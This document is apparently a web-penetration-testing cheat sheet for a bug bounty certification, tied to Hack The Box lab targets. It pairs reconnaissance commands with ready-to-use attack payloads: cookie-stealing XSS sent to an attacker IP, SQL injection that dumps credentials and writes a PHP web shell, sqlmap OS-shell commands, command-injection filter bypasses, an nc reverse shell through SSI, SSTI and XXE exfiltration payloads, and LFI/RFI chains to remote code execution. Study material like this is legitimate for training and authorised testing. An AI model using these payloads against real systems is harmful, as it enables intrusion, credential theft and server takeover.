CBBH
https://github.com/missteek/cpts-quick-references
Web Requests
cURL
Command
Description
curl -s -O inlanefreight.com/index.html
Download file
curl -k https://inlanefreight.com
Skip HTTPS (SSL) certificate validation
curl inlanefreight.com -v
Print full HTTP request/response details
curl -I https://www.inlanefreight.com
Send HEAD request (only prints response headers)
curl -i https://www.inlanefreight.com
Print response headers and response body
curl https://www.inlanefreight.com -A 'Mozilla/5.0'
Set User-Agent header
curl -u admin:admin http://<SERVER_IP>:<PORT>/
Set HTTP basic authorization credentials
curl http://admin:admin@<SERVER_IP>:<PORT>/
Pass HTTP basic authorization credentials in the URL
curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' http://<SERVER_IP>:<PORT>/
Set request header
curl 'http://<SERVER_IP>:<PORT>/search.php?search=le'
Pass GET parameters
curl -X POST -d 'username=admin&password=admin' http://<SERVER_IP>:<PORT>/
Send POST request with POST data
curl -b 'PHPSESSID=c1nsa6op7vtk7kdis7bcnbadf1' http://<SERVER_IP>:<PORT>/
Set request cookies
curl -X POST -d '{"search":"london"}' -H 'Content-Type: application/json' http://<SERVER_IP>:<PORT>/search.php
Send POST request with JSON data
APIs
Command
Description
curl http://<SERVER_IP>:<PORT>/api.php/city/london
Read entry
curl -s http://<SERVER_IP>:<PORT>/api.php/city/ | jq
Read all entries
curl -X POST http://<SERVER_IP>:<PORT>/api.php/city/ -d '{"city_name":"HTB_City", "country_name":"HTB"}' -H 'Content-Type: application/json'
Create (add) entry
curl -X PUT http://<SERVER_IP>:<PORT>/api.php/city/london -d '{"city_name":"New_HTB_City", "country_name":"HTB"}' -H 'Content-Type: application/json'
Update (modify) entry
curl -X DELETE http://<SERVER_IP>:<PORT>/api.php/city/New_HTB_City
Delete entry
Information Gathering
WHOIS
nslookup <target>
Identify A record for the target domain.
export TARGET="domain.tld"
Assign target to an environment variable.
whois $TARGET
WHOIS lookup for the target.
DNS Enumeration
nslookup $TARGET
Identify the A record for the target domain.
nslookup -query=A $TARGET
Identify the A record for the target domain.
dig <TARGET> @<nameserver/IP>
Identify the A record for the target domain.
dig a $TARGET @<nameserver/IP>
Identify the A record for the target domain.
nslookup -query=PTR <IP>
Identify the PTR record for the target IP address.
dig -x <IP> @<nameserver/IP>
Identify the PTR record for the target IP address.
nslookup -query=ANY $TARGET
Identify ANY records for the target domain.
dig any $TARGET @<nameserver/IP>
Identify ANY records for the target domain.
nslookup -query=TXT $TARGET
Identify the TXT records for the target domain.
dig txt $TARGET @<nameserver/IP>
Identify the TXT records for the target domain.
nslookup -query=MX $TARGET
Identify the MX records for the target domain.
dig mx $TARGET @<nameserver/IP>
Identify the MX records for the target domain.
Passive Subdomain Enumeration
VirusTotal
Censys
Crt.sh
curl -s https://sonar.omnisint.io/subdomains/{domain} | jq -r '.[]' sort -u
All subdomains for a given domain.
curl -s https://sonar.omnisint.io/tlds/{domain} jq -r '.[]' sort -u
All TLDs found for a given domain.
curl -s https://sonar.omnisint.io/all/{domain} jq -r '.[]' sort -u
All results across all TLDs for a given domain.
curl -s https://sonar.omnisint.io/reverse/{ip} jq -r '.[]' sort -u
Reverse DNS lookup on IP address.
curl -s https://sonar.omnisint.io/reverse/{ip}/{mask} jq -r '.[]' sort -u
Reverse DNS lookup of a CIDR range.
curl -s "https://crt.sh/?q=${TARGET}&output=json" jq -r '.[] "\(.name_value)\n\(.common_name)"' sort -u
Certificate Transparency.
cat sources.txt \| while read source; do theHarvester -d "${TARGET}" -b $source -f "${source}-${TARGET}";doneSearching for subdomains and other information on the sources provided in the source.txt list.
curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -uThis command fetches JSON-formatted data from crt.sh for example.com (the % is a wildcard), extracts domain names using jq, removes any wildcard prefixes (*.) with sed, and finally sorts and deduplicates the results.
Passive Infrastructure Identification
Netcraft
WayBackMachine
WayBackURLs
waybackurls -dates https://$TARGET > waybackurls.txt
Crawling URLs from a domain with the date it was obtained.
Active Infrastructure Identification
curl -I "http://${TARGET}"
Display HTTP headers of the target webserver.
whatweb -a https://www.facebook.com -v
Technology identification.
Wappalyzer
wafw00f -v https://$TARGET
WAF Fingerprinting.
cat subdomain.list aquatone -out ./aquatone -screenshot-timeout 1000
Makes screenshots of all subdomains in the
subdomain.list.
Active Subdomain Enumeration
HackerTarget
nslookup -type=any -query=AXFR $TARGET nameserver.target.domain
Zone Transfer using Nslookup against the target domain and its nameserver.
gobuster dns -q -r "${NS}" -d "${TARGET}" -w "${WORDLIST}" -p ./patterns.txt -o "gobuster_${TARGET}.txt"
Bruteforcing subdomains.
Virtual Hosts
curl -s http://192.168.10.10 -H "Host: randomtarget.com"
Changing the HOST HTTP header to request a specific domain.
cat ./vhosts.list while read vhost;do echo "\n********\nFUZZING: ${vhost}\n********";curl -s -I http://<IP address> -H "HOST: ${vhost}.target.domain" | grep "Content-Length: ";done
Bruteforcing for possible virtual hosts on the target domain.
ffuf -w ./vhosts -u http://<IP address> -H "HOST: FUZZ.target.domain" -fs 612
Bruteforcing for possible virtual hosts on the target domain using ffuf.
gobuster vhost -u http://192.0.2.1 -w hostnames.txtCrawling
ffuf -recursion -recursion-depth 1 -u http://192.168.10.10/FUZZ -w /opt/useful/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
Discovering files and folders that cannot be spotted by browsing the website.
ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://www.target.domain/FOLDERS/WORDLISTEXTENSIONS
Mutated bruteforcing against the target web server.
Here's a basic Scrapy spider example to extract links from example.com:
import scrapy
class ExampleSpider(scrapy.Spider):
name = "example"
start_urls = ['http://example.com/']
def parse(self, response):
for link in response.css('a::attr(href)').getall():
if any(link.endswith(ext) for ext in self.interesting_extensions):
yield {"file": link}
elif not link.startswith("#") and not link.startswith("mailto:"):
yield response.follow(link, callback=self.parse)jq -r '.[] | select(.file != null) | .file' example_data.json | sort -uAttacking Web Applications with Ffuf
Command
Description
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ
Directory Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ
Extension Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php
Page Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v
Recursive Fuzzing
ffuf -w wordlist.txt:FUZZ -u https://FUZZ.hackthebox.eu/
Subdomain Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb' -fs xxx
VHost Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php?FUZZ=key -fs xxx
Parameter Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx
Parameter Fuzzing
ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx
Value Fuzzing
Wordlists
Command
Description
/opt/useful/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
Directory Wordlist
/opt/useful/seclists/Discovery/Web-Content/web-extensions.txt
Extensions Wordlist
/opt/useful/seclists/Discovery/DNS/subdomains-top1million-5000.txt
Domain Wordlist
/opt/useful/seclists/Discovery/Web-Content/burp-parameter-names.txt
Parameters Wordlist
Misc
Command
Description
sudo sh -c 'echo "SERVER_IP academy.htb" >> /etc/hosts'
Add DNS entry
for i in $(seq 1 1000); do echo $i >> ids.txt; done
Create Sequence Wordlist
JavaScript Deobfuscation
Cross-Site Scripting (XSS)
<script>alert(window.origin)</script>
Basic XSS Payload
<plaintext>
Basic XSS Payload
<script>print()</script>
Basic XSS Payload
<img src="" onerror=alert(window.origin)>
HTML-based XSS Payload
<script>document.body.style.background = "#141d2b"</script>
Change Background Color
<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>
Change Background Image
<script>document.title = 'HackTheBox Academy'</script>
Change Website Title
<script>document.getElementsByTagName('body')[0].innerHTML = 'text'</script>
Overwrite website's main body
<script>document.getElementById('urlform').remove();</script>
Remove certain HTML element
<script src="http://OUR_IP/script.js"></script>
Load remote script
<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>
Send Cookie details to us
python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test"
Run xsstrike on a url parameter
SQL Injection
MySQL
Command
Description
General
mysql -u root -h docker.hackthebox.eu -P 3306 -p
login to mysql database
SHOW DATABASES
List available databases
USE users
Switch to database
Tables
CREATE TABLE logins (id INT, ...)
Add a new table
SHOW TABLES
List available tables in current database
DESCRIBE logins
Show table properties and columns
INSERT INTO table_name VALUES (value_1,..)
Add values to table
INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)
Add values to specific columns in a table
UPDATE table_name SET column1=newvalue1, ... WHERE <condition>
Update table values
Columns
SELECT * FROM table_name
Show all columns in a table
SELECT column1, column2 FROM table_name
Show specific columns in a table
DROP TABLE logins
Delete a table
ALTER TABLE logins ADD newColumn INT
Add new column
ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn
Rename column
ALTER TABLE logins MODIFY oldColumn DATE
Change column datatype
ALTER TABLE logins DROP oldColumn
Delete column
Output
SELECT * FROM logins ORDER BY column_1
Sort by column
SELECT * FROM logins ORDER BY column_1 DESC
Sort by column in descending order
SELECT * FROM logins ORDER BY column_1 DESC, id ASC
Sort by two-columns
SELECT * FROM logins LIMIT 2
Only show first two results
SELECT * FROM logins LIMIT 1, 2
Only show first two results starting from index 2
SELECT * FROM table_name WHERE <condition>
List results that meet a condition
SELECT * FROM logins WHERE username LIKE 'admin%'
List results where the name is similar to a given string
MySQL Operator Precedence
Division (
/), Multiplication (*), and Modulus (%)Addition (
+) and Subtraction (-)Comparison (
=,>,<,<=,>=,!=,LIKE)NOT (
!)AND (
&&)OR (
||)
SQL Injection
Payload
Description
Auth Bypass
admin' or '1'='1
Basic Auth Bypass
admin')-- -
Basic Auth Bypass With comments
Union Injection
' order by 1-- -
Detect number of columns using order by
cn' UNION select 1,2,3-- -
Detect number of columns using Union injection
cn' UNION select 1,@@version,3,4-- -
Basic Union injection
UNION select username, 2, 3, 4 from passwords-- -
Union injection for 4 columns
DB Enumeration
SELECT @@version
Fingerprint MySQL with query output
SELECT SLEEP(5)
Fingerprint MySQL with no output
cn' UNION select 1,database(),2,3-- -
Current database name
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
List all databases
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -
List all tables in a specific database
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -
List all columns in a specific table
cn' UNION select 1, username, password, 4 from dev.credentials-- -
Dump data from a table in another database
Privileges
cn' UNION SELECT 1, user(), 3, 4-- -
Find current user
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -
Find if user has admin privileges
cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
Find if all user privileges
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -
Find which directories can be accessed through MySQL
File Injection
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
Read local file
select 'file written successfully!' into outfile '/var/www/html/proof.txt'
Write a string to a local file
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
Write a web shell into the base web directory
SQLMap
Command
Description
sqlmap -hh
View the advanced help menu
sqlmap -u "http://www.example.com/vuln.php?id=1" --batch
Run SQLMap without asking for user input
sqlmap 'http://www.example.com/' --data 'uid=1&name=test'
SQLMap with POST request
sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'
POST request specifying an injection point with an asterisk
sqlmap -r req.txt
Passing an HTTP request file to SQLMap
sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'
Specifying a cookie header
sqlmap -u www.target.com --data='id=1' --method PUT
Specifying a PUT request
sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt
Store traffic to an output file
sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch
Specify verbosity level
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"
Specifying a prefix or suffix
sqlmap -u www.example.com/?id=1 -v 3 --level=5
Specifying the level and risk
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba
Basic DB enumeration
sqlmap -u "http://www.example.com/?id=1" --tables -D testdb
Table enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname
Table/row enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"
Conditional enumeration
sqlmap -u "http://www.example.com/?id=1" --schema
Database schema enumeration
sqlmap -u "http://www.example.com/?id=1" --search -T user
Searching for data
sqlmap -u "http://www.example.com/?id=1" --passwords --batch
Password enumeration and cracking
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"
Anti-CSRF token bypass
sqlmap --list-tampers
List all tamper scripts
sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba
Check for DBA privileges
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"
Reading a local file
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
Writing a file
sqlmap -u "http://www.example.com/?id=1" --os-shell
Spawning an OS shell
Command Injections
Injection Operators
Injection Operator
Injection Character
URL-Encoded Character
Executed Command
Semicolon
;
%3b
Both
New Line
%0a
Both
Background
&
%26
Both (second output generally shown first)
Pipe
|
%7c
Both (only second output is shown)
AND
&&
%26%26
Both (only if first succeeds)
OR
||
%7c%7c
Second (only if first fails)
Sub-Shell
``
%60%60
Both (Linux-only)
Sub-Shell
$()
%24%28%29
Both (Linux-only)
Linux
Filtered Character Bypass
printenv
Can be used to view all environment variables
Spaces
%09
Using tabs instead of spaces
${IFS}
Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $())
{ls,-la}
Commas will be replaced with spaces
Other Characters
${PATH:0:1}
Will be replaced with /
${LS_COLORS:10:1}
Will be replaced with ;
$(tr '!-}' '"-~'<<<[)
Shift character by one ([ -> \)
Blacklisted Command Bypass
Character Insertion
' or "
Total must be even
$@ or \
Linux only
Case Manipulation
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
Execute command regardless of cases
$(a="WhOaMi";printf %s "${a,,}")
Another variation of the technique
Reversed Commands
echo 'whoami' | rev
Reverse a string
$(rev<<<'imaohw')
Execute reversed command
Encoded Commands
echo -n 'cat /etc/passwd | grep 33' | base64
Encode a string with base64
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
Execute b64 encoded string
Windows
Filtered Character Bypass
Get-ChildItem Env:
Can be used to view all environment variables - (PowerShell)
Spaces
%09
Using tabs instead of spaces
%PROGRAMFILES:~10,-5%
Will be replaced with a space - (CMD)
$env:PROGRAMFILES[10]
Will be replaced with a space - (PowerShell)
Other Characters
%HOMEPATH:~0,-17%
Will be replaced with \ - (CMD)
$env:HOMEPATH[0]
Will be replaced with \ - (PowerShell)
Blacklisted Command Bypass
Character Insertion
' or "
Total must be even
^
Windows only (CMD)
Case Manipulation
WhoAmi
character with odd cases
Reversed Commands
"whoami"[-1..-20] -join ''
Reverse a string
iex "$('imaohw'[-1..-20] -join '')"
Execute reversed command
Encoded Commands
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))
Encode a string with base64
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
Execute b64 encoded string
Separator Characters
List of injection characters and matching URL encoded as wordlist of possible separators:
;
%3b
\n
%0a
&
%26
|
%7c
&&
%26%26
||
%7c%7c
``
%60%60
$()
%24%28%29Obfuscated Commands
List of commands obfuscated as wordlist to test possible WAF filter bypass:
uname
u'n'a'm'e
${uname}
$(uname)
{uname}
$(rev<<<'emanu')
bash<<<$(base64 -d<<<dW5hbWUgLWE=)
b'a's'h'<<<$('b'a's'e'6'4 -d<<<dW5hbWUgLWE=)
l's'${IFS}${PATH:0:1}${IFS}-a'l'File Upload
Character Injection - Before/After Extension to generate list of possible filenames to bypass file upload filters on white or black listings.
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
for ext in '.php' '.php3' '.php4' '.php5' '.php7' '.php8' '.pht' '.phar' '.phpt' '.pgif' '.phtml' '.phtm'; do
echo "shell$char$ext.jpg" >> filenames_wordlist.txt
echo "shell$ext$char.jpg" >> filenames_wordlist.txt
echo "shell.jpg$char$ext" >> filenames_wordlist.txt
echo "shell.jpg$ext$char" >> filenames_wordlist.txt
done
doneWeb Shells
Web Shell
Description
<?php file_get_contents('/etc/passwd'); ?>
Basic PHP File Read
<?php system('hostname'); ?>
Basic PHP Command Execution
<?php system($_REQUEST['cmd']); ?>
Basic PHP Web Shell
<% eval request('cmd') %>
Basic ASP Web Shell
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php
Generate PHP reverse shell
PHP Web Shell
PHP Reverse Shell
Seclists Web Shells
Automated reverse shell
Bypasses
Command
Description
Blacklist Bypass
shell.phtml
Uncommon Extension
shell.pHp
Case Manipulation
List of PHP Extensions
List of ASP Extensions
List of Web Extensions
Whitelist Bypass
shell.jpg.php
Double Extension
shell.php.jpg
Reverse Double Extension
%20, %0a, %00, %0d0a, /, .\, ., …
Character Injection - Before/After Extension
Content/Type Bypass
List of Web Content-Types
List of All Content-Types
List of File Signatures/Magic Bytes
Limited Uploads
Potential Attack
File Types
XSS
HTML, JS, SVG, GIF
XXE/SSRF
XML, SVG, PDF, PPT, DOC
DoS
ZIP, JPG, PNG
Login Brute Forcing
hydra [-l LOGIN|-L FILE] [-p PASS|-P FILE] [-C FILE] -m MODULE [service://server[:PORT][/OPT]]
medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh
medusa -h www.example.com -U users.txt -P passwords.txt -M http -m GEThydra -C wordlist.txt SERVER_IP -s PORT http-get /
Basic Auth Brute Force
hydra -L wordlist.txt -P wordlist.txt -u -f SERVER_IP -s PORT http-get /
Basic Auth Brute Force
hydra -l admin -P wordlist.txt -f SERVER_IP -s PORT http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"
Login Form Brute Force
hydra -L bill.txt -P william.txt -u -f ssh://SERVER_IP:PORT -t 4
SSH Brute Force
cupp -i
Creating Custom Password Wordlist
sed -ri '/^.{,7}$/d' william.txt
Remove Passwords Shorter Than 8
sed -ri '/[!-/:-@\[-`\{-~]+/!d' william.txt
Remove Passwords With No Special Chars
sed -ri '/[0-9]+/!d' william.txt
Remove Passwords With No Numbers
./username-anarchy Bill Gates > bill.txt
Generate Usernames List
Server side request forgery SSRF
Protocols
http://127.0.0.1/
file:///etc/passwd
gopher://dateserver.htb:80/_POST%20/admin.php%20HTTP%2F1.1%0D%0AHost:%20dateserver.htb%0D%0AContent-Length:%2013%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0A%0D%0Aadminpw%3Dadmincurl -i -s "http://<TARGET IP>/load?q=http://<VPN/TUN Adapter IP>:8080"
Testing for SSRF vulnerability
curl -i -s "http://<TARGET IP>/load?q=http://<VPN/TUN Adapter IP>:9090/index.html"
Retrieving a remote file through the target application (HTTP Schema)
curl -i -s "http://<TARGET IP>/load?q=file:///etc/passwd"
Retrieving a local file through the target application (File Schema)
for port in {1..65535};do echo $port >> ports.txt;done
Generating a wordlist of possible ports
ffuf -w ./ports.txt:PORT -u "http://<TARGET IP>/load?q=http://127.0.0.1:PORT" -fs 30
Fuzzing for ports on the internal interface
curl -i -s "http://<TARGET IP>/load?q=http://127.0.0.1:5000"
Interacting with the internal interface on the discovered port
curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=index.html"
Interacting with the internal application
curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http://127.0.0.1:1"
Discovering web application listening in on localhost
curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:1"
Modifying the URL to bypass the error message
curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=file:://///proc/self/environ" -o -
Requesting to disclose the /proc/self/environ file on the internal application
curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=file:://///app/internal_local.py"
Retrieving a local file through the target application
curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=whoami"
Confirming remote code exeuction on the remote host
SSI Injection
SSI Directive Payload Description
Print variables
<!--#printenv -->
Change config
<!--#config errmsg="Error!" -->
Print specific variable
<!--#echo var="DOCUMENT_NAME" var="DATE_LOCAL" -->
Execute command
<!--#exec cmd="whoami" -->
Date
<!--#echo var="DATE_LOCAL" -->
Include web file
<!--#include virtual="index.html" -->
Reverse Shell
<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo /bin/bash 1>/tmp/foo;rm /tmp/foo" -->
SSTI
${{<%[%'"}}%.
Test String
${7*7}
Spring payload
{{_self.env.display("TEST"}}
Twig payload
{{config.items()}}
Jinja2 basic injection
{{ [].class.base.subclasses() }}
Jinja2 dump all classes payload
{% import os %}{{os.system('whoami')}}
Tornado payload
{{7*'7'}}
Confirming Jinja2 backend
./tplmap.py -u 'http://<TARGET IP>:<PORT>/execute?cmd'
Automating with tplmap
XSLT Injection
<xsl:template> # This element indicates an XSL template. It can contain a match attribute that contains a path in the XML-document that the template applies to
<xsl:value-of> # This element extracts the value of the XML node specified in the select attribute
<xsl:for-each> # This elements enables looping over all XML nodes specified in the select attribute
<xsl:sort> # This element specifies the node to sort elements in a for loop by in the select argument. Additionally, a sort order may be specified in the order argument
<xsl:if> # This element can be used to test for conditions on a node. The condition is specified in the test argument
# Injection Payloads
# Information Disclosure
<xsl:value-of select="system-property('xsl:version')" />
<xsl:value-of select="system-property('xsl:vendor')" />
<xsl:value-of select="system-property('xsl:vendor-url')" />
<xsl:value-of select="system-property('xsl:product-name')" />
<xsl:value-of select="system-property('xsl:product-version')" />
# LFI
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')" />
<xsl:value-of select="php:function('file_get_contents','/etc/passwd')" />
# RCE
<xsl:value-of select="php:function('system','id')" />XXE
Code
Description
<!ENTITY xxe SYSTEM "http://localhost/email.dtd">
Define External Entity to a URL
<!ENTITY xxe SYSTEM "file:///etc/passwd">
Define External Entity to a file path
<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">
Read PHP source code with base64 encode filter
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">
Reading a file through a PHP error
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">
Reading a file OOB exfiltration
File Inclusion
Local File Inclusion LFI
Command
Description
/etc/passwd
Basic LFI
../../../../etc/passwd
LFI with path traversal
....//....//....//....//etc/passwd
Bypass basic path traversal filter
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
Bypass filters with URL encoding
/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]
Bypass appended extension with path truncation (obsolete)
../../../../etc/passwd%00
Bypass appended extension with null byte (obsolete)
php://filter/read=convert.base64-encode/resource=config
Read PHP with base64 filter
Remote Code Execution
Command
Description
PHP Wrappers
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
RCE with data wrapper
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"
RCE with input wrapper
http://<SERVER_IP>:/index.php?language=expect://id
RCE with expect wrapper
RFI
echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server <LISTENING_PORT>
Host web shell
/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id
Include remote PHP web shell
LFI + Upload
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
Create malicious image
/index.php?language=./profile_images/shell.gif&cmd=id
RCE with malicious uploaded image
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
Create malicious zip archive 'as jpg'
/index.php?language=zip://shell.zip%23shell.php&cmd=id
RCE with malicious uploaded zip
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
Create malicious phar 'as jpg'
/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id
RCE with malicious uploaded phar
Log Poisoning
/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd
Read PHP session parameters
%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
Poison PHP session with web shell
/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id
RCE through poisoned PHP session
curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>'
Poison server log
/var/log/apache2/access.log&cmd=id
RCE through poisoned PHP session
C:\xampp\apache\logs\
Apache log files on windows XAMPP
# PHP Wrappers
php://filter/read=string.rot13/resource=index.php
php://filter/convert.iconv.utf-8.utf-16/resource=index.php
php://filter/convert.base64-encode/resource=index.php
pHp://FilTer/convert.base64-encode/resource=index.php
php://filter/zlib.deflate/convert.base64-encode/resource=index.php
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=dir
expect://id
expect://lsMisc
File Inclusion Functions
Function
Read Content
Execute
Remote URL
PHP
include()/include_once()
Yes
Yes
Yes
require()/require_once()
Yes
Yes
No
file_get_contents()
Yes
No
Yes
fopen()/file()
Yes
No
No
NodeJS
fs.readFile()
Yes
No
No
fs.sendFile()
Yes
No
No
res.render()
Yes
Yes
No
Java
include
Yes
No
No
import
Yes
Yes
Yes
.NET
@Html.Partial()
Yes
No
No
@Html.RemotePartial()
Yes
No
Yes
Response.WriteFile()
Yes
No
No
include
Yes
Yes
Yes
Last updated